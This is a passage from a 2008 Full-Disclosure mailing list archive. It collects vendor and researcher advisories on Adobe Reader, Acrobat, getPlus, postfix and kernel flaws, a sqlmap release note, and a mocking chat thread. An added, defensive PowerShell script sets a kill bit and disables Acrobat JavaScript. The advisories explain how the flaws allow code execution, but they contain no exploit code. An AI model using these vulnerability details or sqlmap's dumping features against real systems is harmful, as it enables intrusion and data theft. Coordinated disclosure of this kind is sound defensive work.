. 2008-10-03: Vendor informs that there has been a delay in the schedule for the upcoming Reader 8.1.3 release. Its current plan of record is now to target November 4th as the deployment date.
. 2008-10-20: Core asks for confirmation of the release date.
. 2008-10-20: Vendor responds that it is still on track to release Reader 8.1.3 on November 4th, and that it should have a Security Bulletin draft to review next week.
. 2008-10-29: Vendor confirms the release of Reader 8.1.3 on November 4th.
. 2008-11-04: Advisory CORE-2008-0526 is published.

10. *References*

[1] Foxit Reader "util.printf()" Buffer Overflow (CVE-2008-1104) - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1104

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs.

12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security Technologies and (c) 2008 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkkQc60ACgkQyNibggitWa2XmgCfQuemfRRpWnUOqIbJyR/Ioj4c
YjwAn0A6hNouqD4CJI8hmRCnMPvENPRP
=WCMf
-----END PGP SIGNATURE-----

From elazar at hushmail.com Tue Nov 4 16:37:16 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 04 Nov 2008 11:37:16 -0500
Subject: [Full-disclosure] Securing our computers?
Message-ID: <20081104163716.5DC262803B@smtp.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Beer, dry wine, single malts and the occasional shot of good Polish potato vodka...

On Tue, 04 Nov 2008 00:17:17 -0500 Michael Boman wrote:
>Beer and Whiskey, unless you have a good Russian vodka - the
>Swedish
>ones ain't that good compared to the Russians.
>
>Best regards
>Michael Boman
>
>On Tue, Nov 4, 2008 at 2:38 AM, Elazar Broad
>wrote:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Whats your poison of choice?
>>
>> On Mon, 03 Nov 2008 18:12:13 -0500 Michael Boman
>> wrote:
>>>I already have a drinking game going, awarding myself a drink
>for
>>>every time n3td3v says something stupid, and every time I play
>it
>>>I
>>>run out of booze or blacks out... Dangerous stuff... If you are
>in
>>>my
>>>area we can play it together sometime...
>>>
>>>Best regards
>>>Michael Boman
>>>
>>>On Tue, Nov 4, 2008 at 12:06 AM, vulcanius
>>>wrote:
>>>> Actually I think a new game should be created that revolves
>>>around stalking
>>>> n3td3v. Points would be awarded for the quickest response to
>>>each of his
>>>> worthless posts. At the end of the month a Stalker of the
>Month
>>>could be
>>>> selected and given a prize. Bonus points could be given out
>for
>>>the most
>>>> degrading responses. I think it could be a lot of fun.
>>>>
>>>> On Mon, Nov 3, 2008 at 4:58 PM, Ed Carp wrote:
>>>>>
>>>>> Jesus ... you guys need to get back on your lithium...
>>>>>
>>>>> _______________________________________________
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-
>charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>>
>>>
>>>--
>>>http://michaelboman.org - Security Blog & Wiki
>>>
>>>_______________________________________________
>>>Full-Disclosure - We believe in it.
>>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>Hosted and sponsored by Secunia - http://secunia.com/
>> -----BEGIN PGP SIGNATURE-----
>> Charset: UTF8
>> Note: This signature can be verified at
>https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>>
>wpwEAQECAAYFAkkPp6EACgkQi04xwClgpZjskAP/a3SMEtnpaW35KeMcKTkcmdo/Z5D
>y
>>
>IEJUk9PkyTzne+6xHqJ6ZTmeD27yAUNQTIZ68QpJlK/mCtZg0nRcjovV3P5+9dn1LcQ
>3
>>
>myyVoHyuz12oReXEw872nsPfEs7DK5UuplIueTqGW5YaFMZ/4DVgjI9fCo0hp20WbvS
>8
>> 0IwZ5mc=
>> =jTLZ
>> -----END PGP SIGNATURE-----
>>
>> --
>> Find precision scales that can weigh anything. Click now!
>>
>http://tagline.hushmail.com/fc/Ioyw6h4dUuTd7dtWT7hv6q3aYswG8Qwo3mbs
>h76QpUCPJJNNuemryA/
>>
>>
>
>
>
>--
>http://michaelboman.org - Security Blog & Wiki
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQECAAYFAkkQejwACgkQi04xwClgpZhsfgP9HIFtVvYCnAiH98dRHWDIgaNbMkEX
f7YiLnOq1ukT3o2JIRKg+dkUjHOcGjSq2r5HF7M8qnsR2qNwVtjfa3IoWMjgXNYwpXNa
C83n/H7A3FjUdr6FoLpb2PvGAa2gUFz2ERPZQZOY1KK8pWlPNEPKbZZbgfIRGM3jc3LT
6k1u/08=
=1Cyk
-----END PGP SIGNATURE-----

--
Click here to save cash and find low rates on auto loans.
http://tagline.hushmail.com/fc/Ioyw6h4ejOhn5aGxMAVXV99hi30bmWAil30Nvj48shBoA4hiNmaRjq/

From bernardo.damele at gmail.com Tue Nov 4 16:56:09 2008
From: bernardo.damele at gmail.com (Bernardo Damele A. G.)
Date: Tue, 4 Nov 2008 16:56:09 +0000
Subject: [Full-disclosure] [Tool] sqlmap 0.6.2 released
Message-ID:

Hi,

I am glad to release sqlmap version 0.6.2. This is a major bug fixes release.

Introduction
============

sqlmap is an automatic SQL injection tool developed in Python.
Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.

Changes
=======

The major bugs fixed are:

* Major bug fix to correctly dump tables entries when --stop is not specified;
* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
* Major bug fix to correctly update sqlmap to the latest stable release with command line --update;
* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

Download
========

You can download it in various formats:

* Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.gz
* Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.bz2
* Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.zip
* DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.2-1_all.deb
* RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2-1.noarch.rpm
* Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2_exe.zip

Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf
* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/

Happy hacking!

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F

From announce-noreply at rpath.com Tue Nov 4 16:01:45 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Tue, 04 Nov 2008 11:01:45 -0500
Subject: [Full-disclosure] rPSA-2008-0311-1 postfix
Message-ID: <491071e9.t13onQusLrFJtF+v%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0311-1
Published: 2008-11-04
Products:
    rPath Linux 2

Rating: Minor
Exposure Level Classification:
    Local Non-deterministic Denial of Service
Updated Versions:
    postfix=conary.rpath.com at rpl:2/2.4.9-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2769

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3889

Description:
    Previous versions of the postfix package are vulnerable to a local Denial of Service attack due to a file-descriptor leak during execution of external commands (as may be found in a .forward file, for example).

http://wiki.rpath.com/Advisories:rPSA-2008-0311

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From labs-no-reply at idefense.com Tue Nov 4 19:43:42 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 04 Nov 2008 14:43:42 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.04.08: Multiple Vendor NOS Microsystems getPlus Downloader Stack Buffer Overflow Vulnerability
Message-ID: <4910A5EE.1040200@idefense.com>

iDefense Security Advisory 11.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 04, 2008

I. BACKGROUND

The getPlus Download Manager is a software management tool. It is used to download, install, and update other software through the browser. The getPlus Download Manager consists of an ActiveX control that is used to prompt users to install other vendor's software. Adobe uses this control for web based installations of Adobe Reader. If a client installed Adobe Reader through the Adobe website, they will have the control on their system. For more information see the vendor's site at the following URL.

http://www.adobe.com/support/security/bulletins/apsb08-19.html

II. DESCRIPTION

Remote exploitation of a stack based buffer overflow vulnerability in NOS Microsystems Ltd.'s getPlus Download Manager, potentially used by multiple vendors, could allow an attacker to execute arbitrary code with the privileges of the current user.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user viewing the web page. Exploitation requires that attackers social engineer victims into viewing a malicious web page. After the user visits the malicious web page, no further user interaction is needed if the user already has the control installed. If the user visiting the web page does not already have the getPlus control installed, they will be prompted to install it.

This control could potentially be used by a number of different
software vendors. The exploitability of this vulnerability is likely
to be dependent on the way that the given vendor uses the control. In
the case of Adobe Reader, the installation file that triggers the
vulnerability needs to be located on a site ending in adobe.com.
Normally, such a condition would make exploitation significantly more
difficult. However, in this case, by using the http://bugs.adobe.com
site, an attacker can place arbitrary text files onto the site. These
files are supposed to contain information relevant to bug reports, but
this functionality could be abused by an attacker for the purpose of
exploitation.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in getPlus
gp.ocx version 1.2.2.50, which is used in web based installations of
Adobe Reader 8.1. Previous versions may also be affected.

In order to determine if this version of the control is installed, the
Registry Editor can be used to attempt to browse to the registry key:

HKEY_CLASSES_ROOT\CLSID\{CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7}

If that key exists, then the control is installed.

V. WORKAROUND

Setting the kill bit for this control will mitigate the threat of web
based attacks which could be conducted through Internet Explorer. The
CLSID for the vulnerable control is
CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7

VI. VENDOR RESPONSE

Adobe reports that the input validation issue in the Download Manager
used by Adobe Reader has been resolved. Adobe has released an update
which addresses this issue. For more information, consult their
advisory at the following URL.

http://www.adobe.com/support/security/bulletins/apsb08-19.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4817 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/05/2008  Initial Vendor Notification
02/06/2008  Initial Vendor Reply
10/31/2008  Additional Vendor Feedback
11/04/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Peter Vreugdenhil.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use of,
or reliance on, this information.

From labs-no-reply at idefense.com Tue Nov 4 21:03:09 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 04 Nov 2008 16:03:09 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.04.08: Adobe Reader Embedded Font Handling Out of Bounds Array Indexing Vulnerability
Message-ID: <4910B88D.2020906@idefense.com>

iDefense Security Advisory 11.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 04, 2008

I. BACKGROUND

Adobe Acrobat Reader is a program for viewing Portable Document Format
(PDF) documents. More information is available at the following site:

http://www.adobe.com/products/reader/

II. DESCRIPTION

Remote exploitation of an out of bounds array access vulnerability in
Adobe System Inc.'s Adobe Reader could allow an attacker to execute
arbitrary code as the current user.

The vulnerability specifically exists in code responsible for parsing
Type 1 fonts. After allocating an area of memory, no bounds checking is
performed. Subsequent access of this memory may result in modification
of arbitrary memory, which in turn may result in arbitrary code
execution.

III. ANALYSIS

Exploitation of this vulnerability would allow a remote attacker to
execute arbitrary code as the current user. In order to exploit this
vulnerability, the attacker would have to convince the target user to
open a maliciously crafted file, either by opening an email attachment
or visiting a website which contained an embedded PDF file. No further
interaction is required.

The Explorer extension which displays the thumbnail view of the
document, AcroRd32Info, is also vulnerable. This may allow the
vulnerability to be exploited by simply clicking on a PDF file without
opening it, even from a network share.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Adobe
Reader version 8.1.1. Previous versions may also be affected.

V. WORKAROUND

iDefense is currently unaware of any effective workarounds for this
issue. Configuring the application not to open in the browser may
mitigate exposure to some web-based attacks.

VI. VENDOR RESPONSE

Adobe has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.adobe.com/support/security/bulletins/apsb08-19.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4812 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/27/2007  Initial Vendor Notification
12/28/2007  Initial Vendor Reply
10/31/2008  Additional Vendor Feedback
11/04/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Greg MacManus of iDefense Labs.

From zdi-disclosures at 3com.com Tue Nov 4 20:53:57 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 4 Nov 2008 14:53:57 -0600
Subject: [Full-disclosure] ZDI-08-072: Adobe Acrobat PDF Javascript printf Stack Overflow Vulnerability
Message-ID:

ZDI-08-072: Adobe Acrobat PDF Javascript printf Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-072
November 4, 2008

-- CVE ID:
CVE-2008-2992

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The specific flaw exists in the handling of embedded Javascript code
when opening a PDF. Adobe Acrobat has defined its own set of Javascript
functions that can be used in a PDF file. Due to improper parameter
checking to one of these functions arbitrary memory can be over-written
leading to remote code execution. If successfully exploited remote
control of the target system can be gained with the credentials of the
logged in user.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details
can be found at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

-- Disclosure Timeline:
2008-01-21 - Vulnerability reported to vendor
2008-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Vreugdenhil

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for
responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

CONFIDENTIALITY NOTICE: This e-mail message, including any attachments,
is being sent by 3Com for the sole use of the intended recipient(s) and
may contain confidential, proprietary and/or privileged information.
Any unauthorized review, use, disclosure and/or distribution by any
recipient is prohibited. If you are not the intended recipient, please
delete and/or destroy all copies of this message regardless of form and
any included attachments and notify 3Com immediately by contacting the
sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com.

From zdi-disclosures at 3com.com Tue Nov 4 20:54:33 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 4 Nov 2008 14:54:33 -0600
Subject: [Full-disclosure] ZDI-08-074: Adobe Acrobat PDF Javascript getCosObj Memory Corruption Vulnerability
Message-ID:

ZDI-08-074: Adobe Acrobat PDF Javascript getCosObj Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-074
November 4, 2008

-- CVE ID:
CVE-2008-4813

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 5941.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute code on
vulnerable installations of Adobe Acrobat. User interaction is required
in that a user must visit a malicious web site.

The specific flaw exists when processing malicious javascript contained
in a PDF document. When creating a Collab object and performing a
specific sequence of actions on it, memory corruption occurs
potentially resulting in remote code execution. If successfully
exploited full control of the affected machine running under the
credentials of the currently logged in user can be achieved.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details
can be found at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

-- Disclosure Timeline:
2008-05-12 - Vulnerability reported to vendor
2008-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Peter Vreugdenhil

From zdi-disclosures at 3com.com Tue Nov 4 20:54:15 2008
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Tue, 4 Nov 2008 14:54:15 -0600
Subject: [Full-disclosure] ZDI-08-073: Adobe Acrobat Reader Malformed PDF Code Execution Vulnerability
Message-ID:

ZDI-08-073: Adobe Acrobat Reader Malformed PDF Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-073
November 4, 2008

-- CVE ID:
CVE-2008-4813

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6043.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat and Adobe Reader. User
interaction is required to exploit this vulnerability in that the
target must visit a malicious web address or open a malicious file.

The specific flaw exists within the parsing of PDF objects defined in
the file.
When a specific object becomes malformed, a small memory corruption
occurs which can be leveraged by an attacker to execute arbitrary code
under the context of the current user.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More details
can be found at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

-- Disclosure Timeline:
2008-04-08 - Vulnerability reported to vendor
2008-11-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Javier Vicente Vallejo

From geeky.one at hotmail.com Tue Nov 4 21:54:42 2008
From: geeky.one at hotmail.com (John Allison)
Date: Tue, 4 Nov 2008 16:54:42 -0500
Subject: [Full-disclosure] Odays offers
In-Reply-To: <4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>
References: <6158bb410811031123v18969527x8e0a4ac72cf18785@mail.gmail.com> <282134E75BDEB64E943CAF38C80BDD8AD32493@PRO-EXCHANGESRV.experian.dk> <4b6ee9310811040557q161e3321lc4c429275c483702@mail.gmail.com>
Message-ID:

Why would a Whitehat want zone-h shutdown? That makes no sense at all.

> Date: Tue, 4 Nov 2008 13:57:56 +0000
> From: xploitable at gmail.com
> To: full-disclosure at lists.grok.org.uk
> Subject: Re: [Full-disclosure] Odays offers
>
> now maybe he should shut down his zone-h site as well and keep
> whitehats happy :)
>
> On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois
> wrote:
> > sell 'em at wabisabilabi.
> >
> > ops, too late:
> >
> > http://www.techworld.com/security/news/index.cfm?newsID=106294
> >
> > _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From labs-no-reply at idefense.com Tue Nov 4 22:07:32 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Tue, 04 Nov 2008 17:07:32 -0500
Subject: [Full-disclosure] iDefense Security Advisory 11.04.08: Adobe Acrobat And Reader AcroJS Heap Corruption Vulnerability
Message-ID: <4910C7A4.8040205@idefense.com>

iDefense Security Advisory 11.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 04, 2008

I. BACKGROUND

Adobe Reader is a program for viewing Portable Document Format (PDF)
documents. Acrobat is the program used to create such documents. More
information is available at the following URLs.

http://www.adobe.com/products/acrobat/
http://www.adobe.com/products/reader/

II. DESCRIPTION

Remote exploitation of a heap corruption vulnerability in Adobe Systems
Inc.'s Acrobat Professional and Reader could allow an attacker to
execute arbitrary code with the privileges of the current user.

The vulnerable code is an AcroJS function available to scripting code
inside of a PDF document. This function is used for HTTP
authentication. By passing a long string to this function, it is
possible to corrupt heap memory in such a way that may lead to the
execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability would allow an attacker to execute
arbitrary code with the privileges of the current user. In order to
exploit this vulnerability, an attacker would have to convince the
target to open a maliciously constructed file, or to visit a website
with an embedded PDF. If the user has the Adobe Reader Browser plugin
enabled, the PDF file will render inside of the browser.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Acrobat
Professional and Adobe Reader version 8.1.2. Previous versions may also
be affected.

V. WORKAROUND

Disabling JavaScript in Adobe Reader or Acrobat will limit exposure to
this vulnerability.
When JavaScript is disabled, Adobe Reader will prompt the user that
some components of the document may not function, and provide an
opportunity to enable it.

VI. VENDOR RESPONSE

Adobe reports that the input validation issue in the Download Manager
used by Adobe Reader has been resolved and has released a patch which
addresses this issue. A patch is available from the vendor at:

http://www.adobe.com/support/security/bulletins/apsb08-19.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4817 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/21/2008  Initial Vendor Notification
04/28/2008  Additional iDefense Data Provided to Vendor
06/26/2008  Additional Vendor Follow-up
11/04/2008  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by an anonymous
contributor.
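
The registry check and kill-bit workaround from the getPlus advisory (sections IV and V) and the JavaScript workaround from the AcroJS advisory above, as an added example that is not part of any iDefense message. The CLSID is the one the getPlus advisory gives; the `ActiveX Compatibility` key with `Compatibility Flags` 0x400 is the standard Internet Explorer kill-bit mechanism, and the per-user `JSPrefs\bEnableJS` preference is an assumption about where Reader and Acrobat store the setting, since neither advisory names a registry location.

```powershell
# Added example; not iDefense's or Adobe's code.
# Reports (and with -Apply, sets) the two workarounds named in the advisories:
#   1. the IE kill bit for the getPlus ActiveX control
#   2. JavaScript disabled in Adobe Reader / Acrobat for the current user
param([switch]$Apply)

# CLSID taken from the getPlus advisory text.
$Clsid   = '{CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7}'
$KillBit = 0x400   # "Compatibility Flags" bit that stops IE instantiating the control

# Kill-bit locations: native view plus the 32-bit view on 64-bit Windows.
$CompatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# Assumed preference roots; one subkey per installed major version (e.g. 8.0).
$AdobeRoots = @(
    'HKCU:\Software\Adobe\Acrobat Reader',
    'HKCU:\Software\Adobe\Adobe Acrobat'
)

function Test-ControlRegistered {
    # Detection step from section IV: the control is installed if this key exists.
    Test-Path -LiteralPath "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
}

function Get-CompatFlags([string]$Root) {
    $prop = Get-ItemProperty -LiteralPath "$Root\$Clsid" `
        -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $prop) { return 0 }
    return $prop.'Compatibility Flags'
}

function Set-KillBit([string]$Root) {
    $key = "$Root\$Clsid"
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    # OR the bit in so that any flags already present are preserved.
    $flags = (Get-CompatFlags $Root) -bor $KillBit
    New-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
        -PropertyType DWord -Value $flags -Force | Out-Null
}

function Get-AcroJsState {
    foreach ($root in $AdobeRoots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($ver in Get-ChildItem -LiteralPath $root) {
            $js   = "$($ver.PSPath)\JSPrefs"
            $prop = Get-ItemProperty -LiteralPath $js -Name 'bEnableJS' `
                -ErrorAction SilentlyContinue
            # A missing value is treated as the product default (JavaScript on).
            $enabled = ($null -eq $prop) -or ($prop.bEnableJS -ne 0)
            [pscustomobject]@{ Key = $js; JavaScriptEnabled = $enabled }
        }
    }
}

function Disable-AcroJs([string]$JsPrefsKey) {
    if (-not (Test-Path -LiteralPath $JsPrefsKey)) {
        New-Item -Path $JsPrefsKey -Force | Out-Null
    }
    New-ItemProperty -LiteralPath $JsPrefsKey -Name 'bEnableJS' `
        -PropertyType DWord -Value 0 -Force | Out-Null
}

"getPlus control registered: $(Test-ControlRegistered)"

foreach ($root in $CompatRoots) {
    # Skip the Wow6432Node view on systems that do not have it.
    if (-not (Test-Path -LiteralPath (Split-Path $root -Parent))) { continue }
    if ($Apply) { Set-KillBit $root }
    $set = ((Get-CompatFlags $root) -band $KillBit) -ne 0
    "kill bit set under ${root}: $set"
}

foreach ($entry in Get-AcroJsState) {
    if ($Apply -and $entry.JavaScriptEnabled) {
        Disable-AcroJs $entry.Key
        $entry.JavaScriptEnabled = $false
    }
    "$($entry.Key): JavaScript enabled = $($entry.JavaScriptEnabled)"
}
```

Without `-Apply` the script only reports; writing the kill bit under HKLM needs an elevated prompt, and neither setting replaces the vendor update referenced in the advisories.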
From security at mandriva.com Tue Nov 4 23:21:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Tue, 04 Nov 2008 16:21:00 -0700
Subject: [Full-disclosure] [ MDVSA-2008:224 ] kernel
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:224
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kernel
 Date    : November 4, 2008
 Affected: 2009.0
 _______________________________________________________________________

 Problem Description:

 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:

 The error-reporting functionality in (1) fs/ext2/dir.c, (2)
 fs/ext3/dir.c, and possibly (3) fs/ext4/dir.c in the Linux kernel
 2.6.26.5 does not limit the number of printk console messages that
 report directory corruption, which allows physically proximate
 attackers to cause a denial of service (temporary system hang) by
 mounting a filesystem that has corrupted dir->i_size and dir->i_blocks
 values and performing (a) read or (b) write operations. NOTE: there
 are limited scenarios in which this crosses privilege boundaries.
 (CVE-2008-3528)

 The i915 driver in (1) drivers/char/drm/i915_dma.c in the Linux kernel
 2.6.24 on Debian GNU/Linux and (2) sys/dev/pci/drm/i915_drv.c in
 OpenBSD does not restrict the DRM_I915_HWS_ADDR ioctl to the Direct
 Rendering Manager (DRM) master, which allows local users to cause a
 denial of service (memory corruption) via a crafted ioctl call,
 related to absence of the DRM_MASTER and DRM_ROOT_ONLY flags in the
 ioctl's configuration. (CVE-2008-3831)

 The do_splice_from function in fs/splice.c in the Linux kernel before
 2.6.27 does not reject file descriptors that have the O_APPEND flag
 set, which allows local users to bypass append mode and make arbitrary
 changes to other locations in the file. (CVE-2008-4554)

 Additionally, a problem with TCP options ordering, which could
 manifest as connection problems with many websites (bug #43372), was
 solved, a number of fixes for Intel HDA were added, another number of
 fixes for issues on Asus EEE PC, Panasonic Let's Note, Acer One, Dell
 XPS, and others, were also added. Check package changelog for more
 information.

 To update your kernel, please follow the directions located at:

 http://www.mandriva.com/en/security/kernelupdate
